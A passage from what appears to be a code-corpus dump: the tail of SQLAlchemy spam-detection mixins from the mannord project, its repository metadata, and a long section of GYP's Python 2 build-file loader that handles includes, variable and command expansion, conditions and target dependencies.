algorithm. Negative weight indicates spam.
"""
return Column(Float)
@declared_attr
def sd_frozen(cls):
return Column(Boolean, default=False)
@classmethod
def sd_get_items_offline_spam_detect(cls, session):
items = session.query(cls).filter(
cls.sd_frozen == False).all()
return items
class ActionDirichletMixin(object):
@declared_attr
def sd_frozen(cls):
""" If the field is true, then the action participate in offline spam
detection."""
return Column(Boolean, default=False)
@classmethod
def sd_get_actions_offline_spam_detect(cls, session):
actions = session.query(cls).filter(
cls.sd_frozen == False).all()
return actions
class UserKargerMixin(object):
""" Fileds of this class contains information necessary for spam detection
according to the algorithm by Karger."""
@declared_attr
def sk_base_reliab(cls):
""" This field is a base raliability of a user for spam detection task.
"""
return Column(Float, default=0)
@declared_attr
def sk_reliab(cls):
""" Spam detection reliability"""
return Column(Float, default=0)
@declared_attr
def sk_reliab_raw(cls):
""" Raw reliability is user's reliability before applying asymptotic
function or normalization. We need it to perform online update.
"""
return Column(Float, default=0)
@declared_attr
def sk_karma_user_base_reliab(cls):
""" This field is a base reliability for a karma user ("null" user) who
always votes positively for the user's annotation."""
return Column(Float, default=0)
@declared_attr
def sk_karma_user_reliab(cls):
return Column(Float, default=0)
class ItemKargerMixin(object):
@declared_attr
def sk_weight(cls):
""" weight_spam_k is a weight of an item wich computed in Karger's
algorithm. Negative weight indicates spam.
"""
return Column(Float, default=0)
@declared_attr
def sk_frozen(cls):
return Column(Boolean, default=False)
@classmethod
def sk_get_items_offline_spam_detect(cls, session):
items = session.query(cls).filter(
cls.sk_frozen == False).all()
return items
class ActionKargerMixin(object):
@declared_attr
def sk_frozen(cls):
""" If the field is true, then the action does not participate in
offline spam detection."""
return Column(Boolean, default=False)
@classmethod
def sk_get_actions_offline_spam_detect(cls, session):
actions = session.query(cls).filter(
cls.sk_frozen == False).all()
return actions
| {
"content_hash": "caeac88d05f9542a50731aced3df2c84",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 79,
"avg_line_length": 28.944444444444443,
"alnum_prop": 0.6299850714438047,
"repo_name": "mshavlovsky/mannord",
"id": "b5d640dc16a26f13ad722f56edb3ce2634e75ee6",
"size": "4689",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mannord/spam_detection_mixins.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "102440"
},
{
"name": "Shell",
"bytes": "146"
}
],
"symlink_target": ""
} |
from compiler.ast import Const
from compiler.ast import Dict
from compiler.ast import Discard
from compiler.ast import List
from compiler.ast import Module
from compiler.ast import Node
from compiler.ast import Stmt
import compiler
import copy
import gyp.common
import optparse
import os.path
import re
import shlex
import subprocess
import sys
# A list of types that are treated as linkable.
linkable_types = ['executable', 'shared_library', 'loadable_module']
# A list of sections that contain links to other targets.
dependency_sections = ['dependencies', 'export_dependent_settings']
# base_path_sections is a list of sections defined by GYP that contain
# pathnames. The generators can provide more keys, the two lists are merged
# into path_sections, but you should call IsPathSection instead of using either
# list directly.
base_path_sections = [
'destination',
'files',
'include_dirs',
'inputs',
'libraries',
'outputs',
'sources',
]
path_sections = []
def IsPathSection(section):
# If section ends in one of these characters, it's applied to a section
# without the trailing characters. '/' is notably absent from this list,
# because there's no way for a regular expression to be treated as a path.
while section[-1:] in ('=', '+', '?', '!'):
section = section[0:-1]
if section in path_sections or \
section.endswith('_dir') or section.endswith('_dirs') or \
section.endswith('_file') or section.endswith('_files') or \
section.endswith('_path') or section.endswith('_paths'):
return True
return False
# base_non_configuraiton_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations. It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
# Sections that must exist inside targets and not configurations.
'actions',
'configurations',
'copies',
'default_configuration',
'dependencies',
'dependencies_original',
'link_languages',
'libraries',
'postbuilds',
'product_dir',
'product_extension',
'product_name',
'product_prefix',
'rules',
'run_as',
'sources',
'suppress_wildcard',
'target_name',
'toolset',
'toolsets',
'type',
'variants',
# Sections that can be found inside targets or configurations, but that
# should not be propagated from targets into their configurations.
'variables',
]
non_configuration_keys = []
# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
'actions',
'all_dependent_settings',
'configurations',
'dependencies',
'direct_dependent_settings',
'libraries',
'link_settings',
'sources',
'target_name',
'type',
]
# Controls how the generator want the build file paths.
absolute_build_file_paths = False
# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
"""Return a list of all build files included into build_file_path.
The returned list will contain build_file_path as well as all other files
that it included, either directly or indirectly. Note that the list may
contain files that were included into a conditional section that evaluated
to false and was not merged into build_file_path's dict.
aux_data is a dict containing a key for each build file or included build
file. Those keys provide access to dicts whose "included" keys contain
lists of all other files included by the build file.
included should be left at its default None value by external callers. It
is used for recursion.
The returned list will not contain any duplicate entries. Each build file
in the list will be relative to the current directory.
"""
if included == None:
included = []
if build_file_path in included:
return included
included.append(build_file_path)
for included_build_file in aux_data[build_file_path].get('included', []):
GetIncludedBuildFiles(included_build_file, aux_data, included)
return included
def CheckedEval(file_contents):
"""Return the eval of a gyp file.
The gyp file is restricted to dictionaries and lists only, and
repeated keys are not allowed.
Note that this is slower than eval() is.
"""
ast = compiler.parse(file_contents)
assert isinstance(ast, Module)
c1 = ast.getChildren()
assert c1[0] is None
assert isinstance(c1[1], Stmt)
c2 = c1[1].getChildren()
assert isinstance(c2[0], Discard)
c3 = c2[0].getChildren()
assert len(c3) == 1
return CheckNode(c3[0], [])
def CheckNode(node, keypath):
if isinstance(node, Dict):
c = node.getChildren()
dict = {}
for n in range(0, len(c), 2):
assert isinstance(c[n], Const)
key = c[n].getChildren()[0]
if key in dict:
raise KeyError, "Key '" + key + "' repeated at level " + \
repr(len(keypath) + 1) + " with key path '" + \
'.'.join(keypath) + "'"
kp = list(keypath) # Make a copy of the list for descending this node.
kp.append(key)
dict[key] = CheckNode(c[n + 1], kp)
return dict
elif isinstance(node, List):
c = node.getChildren()
children = []
for index, child in enumerate(c):
kp = list(keypath) # Copy list.
kp.append(repr(index))
children.append(CheckNode(child, kp))
return children
elif isinstance(node, Const):
return node.getChildren()[0]
else:
raise TypeError, "Unknown AST node at key path '" + '.'.join(keypath) + \
"': " + repr(node)
def LoadOneBuildFile(build_file_path, data, aux_data, variables, includes,
is_target, check):
if build_file_path in data:
return data[build_file_path]
if os.path.exists(build_file_path):
build_file_contents = open(build_file_path).read()
else:
raise Exception("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))
build_file_data = None
try:
if check:
build_file_data = CheckedEval(build_file_contents)
else:
build_file_data = eval(build_file_contents, {'__builtins__': None},
None)
except SyntaxError, e:
e.filename = build_file_path
raise
except Exception, e:
gyp.common.ExceptionAppend(e, 'while reading ' + build_file_path)
raise
data[build_file_path] = build_file_data
aux_data[build_file_path] = {}
# Scan for includes and merge them in.
try:
if is_target:
LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
aux_data, variables, includes, check)
else:
LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
aux_data, variables, None, check)
except Exception, e:
gyp.common.ExceptionAppend(e,
'while reading includes of ' + build_file_path)
raise
return build_file_data
def LoadBuildFileIncludesIntoDict(subdict, subdict_path, data, aux_data,
variables, includes, check):
includes_list = []
if includes != None:
includes_list.extend(includes)
if 'includes' in subdict:
for include in subdict['includes']:
# "include" is specified relative to subdict_path, so compute the real
# path to include by appending the provided "include" to the directory
# in which subdict_path resides.
relative_include = \
os.path.normpath(os.path.join(os.path.dirname(subdict_path), include))
includes_list.append(relative_include)
# Unhook the includes list, it's no longer needed.
del subdict['includes']
# Merge in the included files.
for include in includes_list:
if not 'included' in aux_data[subdict_path]:
aux_data[subdict_path]['included'] = []
aux_data[subdict_path]['included'].append(include)
gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'" % include)
MergeDicts(subdict,
LoadOneBuildFile(include, data, aux_data, variables, None,
False, check),
subdict_path, include)
# Recurse into subdictionaries.
for k, v in subdict.iteritems():
if v.__class__ == dict:
LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, variables,
None, check)
elif v.__class__ == list:
LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, variables,
check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data,
variables, check):
for item in sublist:
if item.__class__ == dict:
LoadBuildFileIncludesIntoDict(item, sublist_path, data, aux_data,
variables, None, check)
elif item.__class__ == list:
LoadBuildFileIncludesIntoList(item, sublist_path, data, aux_data,
variables, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
if 'targets' in data:
target_list = data['targets']
new_target_list = []
for target in target_list:
global multiple_toolsets
if multiple_toolsets:
toolsets = target.get('toolsets', ['target'])
else:
toolsets = ['target']
if len(toolsets) > 0:
# Optimization: only do copies if more than one toolset is specified.
for build in toolsets[1:]:
new_target = copy.deepcopy(target)
new_target['toolset'] = build
new_target_list.append(new_target)
target['toolset'] = toolsets[0]
new_target_list.append(target)
data['targets'] = new_target_list
if 'conditions' in data:
for condition in data['conditions']:
if isinstance(condition, list):
for condition_dict in condition[1:]:
ProcessToolsetsInDict(condition_dict)
# TODO(mark): I don't love this name. It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(build_file_path, data, aux_data, variables, includes,
depth, check):
global absolute_build_file_paths
# If depth is set, predefine the DEPTH variable to be a relative path from
# this build file's directory to the directory identified by depth.
if depth:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
if d == '':
variables['DEPTH'] = '.'
else:
variables['DEPTH'] = d.replace('\\', '/')
# If the generator needs absolue paths, then do so.
if absolute_build_file_paths:
build_file_path = os.path.abspath(build_file_path)
if build_file_path in data['target_build_files']:
# Already loaded.
return
data['target_build_files'].add(build_file_path)
gyp.DebugOutput(gyp.DEBUG_INCLUDES,
"Loading Target Build File '%s'" % build_file_path)
build_file_data = LoadOneBuildFile(build_file_path, data, aux_data, variables,
includes, True, check)
# Store DEPTH for later use in generators.
build_file_data['_DEPTH'] = depth
# Set up the included_files key indicating which .gyp files contributed to
# this target dict.
if 'included_files' in build_file_data:
raise KeyError, build_file_path + ' must not contain included_files key'
included = GetIncludedBuildFiles(build_file_path, aux_data)
build_file_data['included_files'] = []
for included_file in included:
# included_file is relative to the current directory, but it needs to
# be made relative to build_file_path's directory.
included_relative = \
gyp.common.RelativePath(included_file,
os.path.dirname(build_file_path))
build_file_data['included_files'].append(included_relative)
ProcessToolsetsInDict(build_file_data)
# Apply "pre"/"early" variable expansions and condition evaluations.
ProcessVariablesAndConditionsInDict(build_file_data, False, variables,
build_file_path)
# Look at each project's target_defaults dict, and merge settings into
# targets.
if 'target_defaults' in build_file_data:
index = 0
if 'targets' in build_file_data:
while index < len(build_file_data['targets']):
# This procedure needs to give the impression that target_defaults is
# used as defaults, and the individual targets inherit from that.
# The individual targets need to be merged into the defaults. Make
# a deep copy of the defaults for each target, merge the target dict
# as found in the input file into that copy, and then hook up the
# copy with the target-specific data merged into it as the replacement
# target dict.
old_target_dict = build_file_data['targets'][index]
new_target_dict = copy.deepcopy(build_file_data['target_defaults'])
MergeDicts(new_target_dict, old_target_dict,
build_file_path, build_file_path)
build_file_data['targets'][index] = new_target_dict
index = index + 1
else:
raise Exception, \
"Unable to find targets in build file %s" % build_file_path
# No longer needed.
del build_file_data['target_defaults']
# Look for dependencies. This means that dependency resolution occurs
# after "pre" conditionals and variable expansion, but before "post" -
# in other words, you can't put a "dependencies" section inside a "post"
# conditional within a target.
if 'targets' in build_file_data:
for target_dict in build_file_data['targets']:
if 'dependencies' not in target_dict:
continue
for dependency in target_dict['dependencies']:
other_build_file = \
gyp.common.ResolveTarget(build_file_path, dependency, None)[0]
try:
LoadTargetBuildFile(other_build_file, data, aux_data, variables,
includes, depth, check)
except Exception, e:
gyp.common.ExceptionAppend(
e, 'while loading dependencies of %s' % build_file_path)
raise
return data
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple. For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
def FindEnclosingBracketGroup(input):
brackets = { '}': '{',
']': '[',
')': '(', }
stack = []
count = 0
start = -1
for char in input:
if char in brackets.values():
stack.append(char)
if start == -1:
start = count
if char in brackets.keys():
try:
last_bracket = stack.pop()
except IndexError:
return (-1, -1)
if last_bracket != brackets[char]:
return (-1, -1)
if len(stack) == 0:
return (start, count + 1)
count = count + 1
return (-1, -1)
canonical_int_re = re.compile('^(0|-?[1-9][0-9]*)$')
def IsStrCanonicalInt(string):
"""Returns True if |string| is in its canonical integer form.
The canonical form is such that str(int(string)) == string.
"""
if not isinstance(string, str) or not canonical_int_re.match(string):
return False
return True
early_variable_re = re.compile('(?P<replace>(?P<type><((!?@?)|\|)?)'
'\((?P<is_array>\s*\[?)'
'(?P<content>.*?)(\]?)\))')
late_variable_re = re.compile('(?P<replace>(?P<type>>((!?@?)|\|)?)'
'\((?P<is_array>\s*\[?)'
'(?P<content>.*?)(\]?)\))')
# Global cache of results from running commands so they don't have to be run
# more then once.
cached_command_results = {}
def FixupPlatformCommand(cmd):
if sys.platform == 'win32':
if type(cmd) == list:
cmd = [re.sub('^cat ', 'type ', cmd[0])] + cmd[1:]
else:
cmd = re.sub('^cat ', 'type ', cmd)
return cmd
def ExpandVariables(input, is_late, variables, build_file):
# Look for the pattern that gets expanded into variables
if not is_late:
variable_re = early_variable_re
expansion_symbol = '<'
else:
variable_re = late_variable_re
expansion_symbol = '>'
input_str = str(input)
# Do a quick scan to determine if an expensive regex search is warranted.
if expansion_symbol in input_str:
# Get the entire list of matches as a list of MatchObject instances.
# (using findall here would return strings instead of MatchObjects).
matches = [match for match in variable_re.finditer(input_str)]
else:
matches = None
output = input_str
if matches:
# Reverse the list of matches so that replacements are done right-to-left.
# That ensures that earlier replacements won't mess up the string in a
# way that causes later calls to find the earlier substituted text instead
# of what's intended for replacement.
matches.reverse()
for match_group in matches:
match = match_group.groupdict()
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Matches: %s" % repr(match))
# match['replace'] is the substring to look for, match['type']
# is the character code for the replacement type (< > <! >! <| >| <@
# >@ <!@ >!@), match['is_array'] contains a '[' for command
# arrays, and match['content'] is the name of the variable (< >)
# or command to run (<! >!).
# run_command is true if a ! variant is used.
run_command = '!' in match['type']
# file_list is true if a | variant is used.
file_list = '|' in match['type']
# Capture these now so we can adjust them later.
replace_start = match_group.start('replace')
replace_end = match_group.end('replace')
# Find the ending paren, and re-evaluate the contained string.
(c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])
# Adjust the replacement range to match the entire command
# found by FindEnclosingBracketGroup (since the variable_re
# probably doesn't match the entire command if it contained
# nested variables).
replace_end = replace_start + c_end
# Find the "real" replacement, matching the appropriate closing
# paren, and adjust the replacement start and end.
replacement = input_str[replace_start:replace_end]
# Figure out what the contents of the variable parens are.
contents_start = replace_start + c_start + 1
contents_end = replace_end - 1
contents = input_str[contents_start:contents_end]
# Do filter substitution now for <|().
# Admittedly, this is different than the evaluation order in other
# contexts. However, since filtration has no chance to run on <|(),
# this seems like the only obvious way to give them access to filters.
if file_list:
processed_variables = copy.deepcopy(variables)
ProcessListFiltersInDict(contents, processed_variables)
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, is_late,
processed_variables, build_file)
else:
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, is_late, variables, build_file)
# Strip off leading/trailing whitespace so that variable matches are
# simpler below (and because they are rarely needed).
contents = contents.strip()
# expand_to_list is true if an @ variant is used. In that case,
# the expansion should result in a list. Note that the caller
# is to be expecting a list in return, and not all callers do
# because not all are working in list context. Also, for list
# expansions, there can be no other text besides the variable
# expansion in the input string.
expand_to_list = '@' in match['type'] and input_str == replacement
if run_command or file_list:
# Find the build file's directory, so commands can be run or file lists
# generated relative to it.
build_file_dir = os.path.dirname(build_file)
if build_file_dir == '':
# If build_file is just a leaf filename indicating a file in the
# current directory, build_file_dir might be an empty string. Set
# it to None to signal to subprocess.Popen that it should run the
# command in the current directory.
build_file_dir = None
# Support <|(listfile.txt ...) which generates a file
# containing items from a gyp list, generated at gyp time.
# This works around actions/rules which have more inputs than will
# fit on the command line.
if file_list:
if type(contents) == list:
contents_list = contents
else:
contents_list = contents.split(' ')
replacement = contents_list[0]
path = replacement
if not os.path.isabs(path):
path = os.path.join(build_file_dir, path)
f = gyp.common.WriteOnDiff(path)
for i in contents_list[1:]:
f.write('%s\n' % i)
f.close()
elif run_command:
use_shell = True
if match['is_array']:
contents = eval(contents)
use_shell = False
# Check for a cached value to avoid executing commands, or generating
# file lists more than once.
# TODO(http://code.google.com/p/gyp/issues/detail?id=112): It is
# possible that the command being invoked depends on the current
# directory. For that case the syntax needs to be extended so that the
# directory is also used in cache_key (it becomes a tuple).
# TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
# someone could author a set of GYP files where each time the command
# is invoked it produces different output by design. When the need
# arises, the syntax should be extended to support no caching off a
# command's output so it is run every time.
cache_key = str(contents)
cached_value = cached_command_results.get(cache_key, None)
if cached_value is None:
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Executing command '%s' in directory '%s'" %
(contents,build_file_dir))
# Fix up command with platform specific workarounds.
contents = FixupPlatformCommand(contents)
p = subprocess.Popen(contents, shell=use_shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=build_file_dir)
(p_stdout, p_stderr) = p.communicate('')
if p.wait() != 0 or p_stderr:
sys.stderr.write(p_stderr)
# Simulate check_call behavior, since check_call only exists
# in python 2.5 and later.
raise Exception("Call to '%s' returned exit status %d." %
(contents, p.returncode))
replacement = p_stdout.rstrip()
cached_command_results[cache_key] = replacement
else:
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Had cache value for command '%s' in directory '%s'" %
(contents,build_file_dir))
replacement = cached_value
else:
if not contents in variables:
raise KeyError, 'Undefined variable ' + contents + \
' in ' + build_file
replacement = variables[contents]
if isinstance(replacement, list):
for item in replacement:
if not isinstance(item, str) and not isinstance(item, int):
raise TypeError, 'Variable ' + contents + \
' must expand to a string or list of strings; ' + \
'list contains a ' + \
item.__class__.__name__
# Run through the list and handle variable expansions in it. Since
# the list is guaranteed not to contain dicts, this won't do anything
# with conditions sections.
ProcessVariablesAndConditionsInList(replacement, is_late, variables,
build_file)
elif not isinstance(replacement, str) and \
not isinstance(replacement, int):
raise TypeError, 'Variable ' + contents + \
' must expand to a string or list of strings; ' + \
'found a ' + replacement.__class__.__name__
if expand_to_list:
# Expanding in list context. It's guaranteed that there's only one
# replacement to do in |input_str| and that it's this replacement. See
# above.
if isinstance(replacement, list):
# If it's already a list, make a copy.
output = replacement[:]
else:
# Split it the same way sh would split arguments.
output = shlex.split(str(replacement))
else:
# Expanding in string context.
encoded_replacement = ''
if isinstance(replacement, list):
# When expanding a list into string context, turn the list items
# into a string in a way that will work with a subprocess call.
#
# TODO(mark): This isn't completely correct. This should
# call a generator-provided function that observes the
# proper list-to-argument quoting rules on a specific
# platform instead of just calling the POSIX encoding
# routine.
encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
else:
encoded_replacement = replacement
output = output[:replace_start] + str(encoded_replacement) + \
output[replace_end:]
# Prepare for the next match iteration.
input_str = output
# Look for more matches now that we've replaced some, to deal with
# expanding local variables (variables defined in the same
# variables block as this one).
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Found output %s, recursing." % repr(output))
if isinstance(output, list):
new_output = []
for item in output:
new_output.append(ExpandVariables(item, is_late, variables, build_file))
output = new_output
else:
output = ExpandVariables(output, is_late, variables, build_file)
# Convert all strings that are canonically-represented integers into integers.
if isinstance(output, list):
for index in xrange(0, len(output)):
if IsStrCanonicalInt(output[index]):
output[index] = int(output[index])
elif IsStrCanonicalInt(output):
output = int(output)
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Expanding %s to %s" % (repr(input), repr(output)))
return output
def ProcessConditionsInDict(the_dict, is_late, variables, build_file):
# Process a 'conditions' or 'target_conditions' section in the_dict,
# depending on is_late. If is_late is False, 'conditions' is used.
#
# Each item in a conditions list consists of cond_expr, a string expression
# evaluated as the condition, and true_dict, a dict that will be merged into
# the_dict if cond_expr evaluates to true. Optionally, a third item,
# false_dict, may be present. false_dict is merged into the_dict if
# cond_expr evaluates to false.
#
# Any dict merged into the_dict will be recursively processed for nested
# conditionals and other expansions, also according to is_late, immediately
# prior to being merged.
if not is_late:
conditions_key = 'conditions'
else:
conditions_key = 'target_conditions'
if not conditions_key in the_dict:
return
conditions_list = the_dict[conditions_key]
# Unhook the conditions list, it's no longer needed.
del the_dict[conditions_key]
for condition in conditions_list:
if not isinstance(condition, list):
raise TypeError, conditions_key + ' must be a list'
if len(condition) != 2 and len(condition) != 3:
# It's possible that condition[0] won't work in which case this
# attempt will raise its own IndexError. That's probably fine.
raise IndexError, conditions_key + ' ' + condition[0] + \
' must be length 2 or 3, not ' + str(len(condition))
[cond_expr, true_dict] = condition[0:2]
false_dict = None
if len(condition) == 3:
false_dict = condition[2]
# Do expansions on the condition itself. Since the conditon can naturally
# contain variable references without needing to resort to GYP expansion
# syntax, this is of dubious value for variables, but someone might want to
# use a command expansion directly inside a condition.
cond_expr_expanded = ExpandVariables(cond_expr, is_late, variables,
build_file)
if not isinstance(cond_expr_expanded, str) and \
not isinstance(cond_expr_expanded, int):
raise ValueError, \
'Variable expansion in this context permits str and int ' + \
'only, found ' + expanded.__class__.__name__
try:
ast_code = compile(cond_expr_expanded, '<string>', 'eval')
if eval(ast_code, {'__builtins__': None}, variables):
merge_dict = true_dict
else:
merge_dict = false_dict
except SyntaxError, e:
syntax_error = SyntaxError('%s while evaluating condition \'%s\' in %s '
'at character %d.' %
(str(e.args[0]), e.text, build_file, e.offset),
e.filename, e.lineno, e.offset, e.text)
raise syntax_error
except NameError, e:
gyp.common.ExceptionAppend(e, 'while evaluating condition \'%s\' in %s' %
(cond_expr_expanded, build_file))
raise
if merge_dict != None:
# Expand variables and nested conditinals in the merge_dict before
# merging it.
ProcessVariablesAndConditionsInDict(merge_dict, is_late,
variables, build_file)
MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
# Any keys with plain string values in the_dict become automatic variables.
# The variable name is the key name with a "_" character prepended.
for key, value in the_dict.iteritems():
if isinstance(value, str) or isinstance(value, int) or \
isinstance(value, list):
variables['_' + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
# Any keys in the_dict's "variables" dict, if it has one, becomes a
# variable. The variable name is the key name in the "variables" dict.
# Variables that end with the % character are set only if they are unset in
# the variables dict. the_dict_key is the name of the key that accesses
# the_dict in the_dict's parent dict. If the_dict's parent is not a dict
# (it could be a list or it could be parentless because it is a root dict),
# the_dict_key will be None.
for key, value in the_dict.get('variables', {}).iteritems():
if not isinstance(value, str) and not isinstance(value, int) and \
not isinstance(value, list):
continue
if key.endswith('%'):
variable_name = key[:-1]
if variable_name in variables:
# If the variable is already set, don't set it.
continue
if the_dict_key is 'variables' and variable_name in the_dict:
# If the variable is set without a % in the_dict, and the_dict is a
# variables dict (making |variables| a varaibles sub-dict of a
# variables dict), use the_dict's definition.
value = the_dict[variable_name]
else:
variable_name = key
variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(the_dict, is_late, variables_in,
build_file, the_dict_key=None):
"""Handle all variable and command expansion and conditional evaluation.
This function is the public entry point for all variable expansions and
conditional evaluations. The variables_in dictionary will not be modified
by this function.
"""
# Make a copy of the variables_in dict that can be modified during the
# loading of automatics and the loading of the variables dict.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
if 'variables' in the_dict:
# Make sure all the local variables are added to the variables
# list before we process them so that you can reference one
# variable from another. They will be fully expanded by recursion
# in ExpandVariables.
for key, value in the_dict['variables'].iteritems():
variables[key] = value
# Handle the associated variables dict first, so that any variable
# references within can be resolved prior to using them as variables.
# Pass a copy of the variables dict to avoid having it be tainted.
# Otherwise, it would have extra automatics added for everything that
# should just be an ordinary variable in this scope.
ProcessVariablesAndConditionsInDict(the_dict['variables'], is_late,
variables, build_file, 'variables')
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
for key, value in the_dict.iteritems():
# Skip "variables", which was already processed if present.
if key != 'variables' and isinstance(value, str):
expanded = ExpandVariables(value, is_late, variables, build_file)
if not isinstance(expanded, str) and not isinstance(expanded, int):
raise ValueError, \
'Variable expansion in this context permits str and int ' + \
'only, found ' + expanded.__class__.__name__ + ' for ' + key
the_dict[key] = expanded
# Variable expansion may have resulted in changes to automatics. Reload.
# TODO(mark): Optimization: only reload if no changes were made.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Process conditions in this dict. This is done after variable expansion
# so that conditions may take advantage of expanded variables. For example,
# if the_dict contains:
# {'type': '<(library_type)',
# 'conditions': [['_type=="static_library"', { ... }]]},
# _type, as used in the condition, will only be set to the value of
# library_type if variable expansion is performed before condition
# processing. However, condition processing should occur prior to recursion
# so that variables (both automatic and "variables" dict type) may be
# adjusted by conditions sections, merged into the_dict, and have the
# intended impact on contained dicts.
#
# This arrangement means that a "conditions" section containing a "variables"
# section will only have those variables effective in subdicts, not in
# the_dict. The workaround is to put a "conditions" section within a
# "variables" section. For example:
# {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will not result in "IS_MAC" being appended to the "defines" list in the
# current scope but would result in it being appended to the "defines" list
# within "my_subdict". By comparison:
# {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will append "IS_MAC" to both "defines" lists.
# Evaluate conditions sections, allowing variable expansions within them
# as well as nested conditionals. This will process a 'conditions' or
# 'target_conditions' section, perform appropriate merging and recursive
# conditional and variable processing, and then remove the conditions section
# from the_dict if it is present.
ProcessConditionsInDict(the_dict, is_late, variables, build_file)
# Conditional processing may have resulted in changes to automatics or the
# variables dict. Reload.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Recurse into child dicts, or process child lists which may result in
# further recursion into descendant dicts.
for key, value in the_dict.iteritems():
# Skip "variables" and string values, which were already processed if
# present.
if key == 'variables' or isinstance(value, str):
continue
if isinstance(value, dict):
# Pass a copy of the variables dict so that subdicts can't influence
# parents.
ProcessVariablesAndConditionsInDict(value, is_late, variables,
build_file, key)
elif isinstance(value, list):
# The list itself can't influence the variables dict, and
# ProcessVariablesAndConditionsInList will make copies of the variables
# dict if it needs to pass it to something that can influence it. No
# copy is necessary here.
ProcessVariablesAndConditionsInList(value, is_late, variables,
build_file)
elif not isinstance(value, int):
raise TypeError, 'Unknown type ' + value.__class__.__name__ + \
' for ' + key
def ProcessVariablesAndConditionsInList(the_list, is_late, variables,
build_file):
# Iterate using an index so that new values can be assigned into the_list.
index = 0
while index < len(the_list):
item = the_list[index]
if isinstance(item, dict):
# Make a copy of the variables dict so that it won't influence anything
# outside of its own scope.
ProcessVariablesAndConditionsInDict(item, is_late, variables, build_file)
elif isinstance(item, list):
ProcessVariablesAndConditionsInList(item, is_late, variables, build_file)
elif isinstance(item, str):
expanded = ExpandVariables(item, is_late, variables, build_file)
if isinstance(expanded, str) or isinstance(expanded, int):
the_list[index] = expanded
elif isinstance(expanded, list):
del the_list[index]
for expanded_item in expanded:
the_list.insert(index, expanded_item)
index = index + 1
# index now identifies the next item to examine. Continue right now
# without falling into the index increment below.
continue
else:
raise ValueError, \
'Variable expansion in this context permits strings and ' + \
'lists only, found ' + expanded.__class__.__name__ + ' at ' + \
index
elif not isinstance(item, int):
raise TypeError, 'Unknown type ' + item.__class__.__name__ + \
' at index ' + index
index = index + 1
def BuildTargetsDict(data):
"""Builds a dict mapping fully-qualified target names to their target dicts.
|data| is a dict mapping loaded build files by pathname relative to the
current directory. Values in |data| are build file contents. For each
|data| value with a "targets" key, the value of the "targets" key is taken
as a list containing target dicts. Each target's fully-qualified name is
constructed from the pathname of the build file (|data| key) and its
"target_name" property. These fully-qualified names are used as the keys
in the returned dict. These keys provide access to the target dicts,
the dicts in the "targets" lists.
"""
targets = {}
for build_file in data['target_build_files']:
for target in data[build_file].get('targets', []):
target_name = gyp.common.QualifiedTarget(build_file,
target['target_name'],
target['toolset'])
if target_name in targets:
raise KeyError, 'Duplicate target definitions for ' + target_name
targets[target_name] = target
return targets
def QualifyDependencies(targets):
"""Make dependency links fully-qualified relative to the current directory.
|targets| is a dict mapping fully-qualified target names to their target
dicts. For each target in this dict, keys known to contain dependency
links are examined, and any dependencies referenced will be rewritten
so that they are fully-qualified and relative to the current directory.
All rewritten dependencies are suitable for use as keys to |targets| or a
similar dict.
"""
for target, target_dict in targets.iteritems():
target_build_file = gyp.common.BuildFile(target)
toolset = target_dict['toolset']
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
for index in xrange(0, len(dependencies)):
dep_file, dep_target, dep_toolset = gyp.common.ResolveTarget(
target_build_file, dependencies[index], toolset)
global multiple_toolsets
if not multiple_toolsets:
# Ignore toolset specification in the dependency if it is specified.
dep_toolset = toolset
